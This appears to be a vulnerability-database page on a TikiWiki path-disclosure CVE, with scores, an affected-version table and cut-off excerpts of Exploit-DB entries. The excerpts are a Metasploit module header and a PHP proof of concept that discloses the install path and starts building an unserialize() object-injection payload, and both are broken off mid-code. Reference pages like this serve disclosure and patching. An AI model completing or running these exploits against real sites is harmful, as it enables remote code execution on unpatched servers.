CVE-2012-3996
published 2012-07-12CVE-2012-3996: TikiWiki CMS/Groupware 8.3 and earlier allows remote attackers to obtain the installation path via a direct request to (1) admin/include_calendar.php, (2)…
PriorityP422medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
4.59%
90.5th percentile
TikiWiki CMS/Groupware 8.3 and earlier allows remote attackers to obtain the installation path via a direct request to (1) admin/include_calendar.php, (2) tiki-rss_error.php, or (3) tiki-watershed_service.php.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | <= 8.2 | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)
exploitdb·2012-07-09
CVE-2012-3996 Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Tiki Wiki %q{
This module exploits a php unserialize() vulnerability in Tiki Wiki
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2012-0911' ],
[ 'BID', '54298' ],
[ 'EDB', '19573' ],
[ 'URL', 'http://dev.tiki.org/item4109' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' =
Exploit-DB
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution
exploitdb·2012-07-04
CVE-2012-0911 Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution
---
(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n");
return $m[1];
}
print "\n+----------------------------------------------------------------------+";
print "\n| Tiki Wiki CMS Groupware \n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /tiki/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$f_path = get_path();
print "\n[-] Path disclosure: {$f_path}\n";
class Zend_Search_Lucene_Index_FieldInfo
{
public $name = '';
}
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
protected $_dirPath = null;
public function __construct($path)
{
$this->_dirPath = $path;
}
}
interface Zend_Pdf_ElementFactory_Interface {}
class Zend_
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2012-07/0020.htmlhttp://dev.tiki.org/item4109http://info.tiki.org/article190-Tiki-Wiki-CMS-Groupware-Updates-Tiki-6-7-LTShttp://info.tiki.org/article191-Tiki-Releases-8-4http://www.exploit-db.com/exploits/19573http://www.exploit-db.com/exploits/19630http://www.osvdb.org/83533http://archives.neohapsis.com/archives/bugtraq/2012-07/0020.htmlhttp://dev.tiki.org/item4109http://info.tiki.org/article190-Tiki-Wiki-CMS-Groupware-Updates-Tiki-6-7-LTShttp://info.tiki.org/article191-Tiki-Releases-8-4http://www.exploit-db.com/exploits/19573http://www.exploit-db.com/exploits/19630http://www.osvdb.org/83533
2012-07-12
Published